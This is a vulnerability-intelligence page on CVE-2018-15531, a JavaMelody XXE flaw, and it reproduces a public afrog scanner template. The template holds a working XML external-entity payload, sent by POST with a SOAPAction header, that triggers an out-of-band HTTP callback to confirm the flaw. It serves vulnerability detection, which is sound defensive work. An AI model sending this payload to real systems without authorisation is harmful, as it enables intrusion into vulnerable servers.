CVE-2018-15531: JavaMelody XXE - 漏洞情报订阅

漏洞描述

JavaMelody before 1.74.0 has XXE via parseSoapMethodName in bull/javamelody/PayloadNameRequestWrapper.java.

PoC代码[已公开]

id: CVE-2018-15531

info:
  name: JavaMelody XXE
  author: Lay0us1
  severity: high
  verified: false
  description: |-
    JavaMelody before 1.74.0 has XXE via parseSoapMethodName in bull/javamelody/PayloadNameRequestWrapper.java.
  reference:
    - https://imagemlt.github.io/post/melodyXXE/index.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-15531
  tags: cve,cve2018,xxe,javamelody
  created: 2024/02/25

set:
  oob: oob()
  oobHTTP: oob.HTTP
rules:
  r0:
    request:
      method: POST
      path: /
      headers:
        Content-Type: text/xml
        SOAPAction: aaaaa
      body: |
        <?xml version="1.0" encoding="UTF-8" standalone="no" ?>
        <!DOCTYPE root [
        <!ENTITY % remote SYSTEM "{{oobHTTP}}">
        %remote;
        ]>
        </root>
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2018/CVE-2018-15531.yaml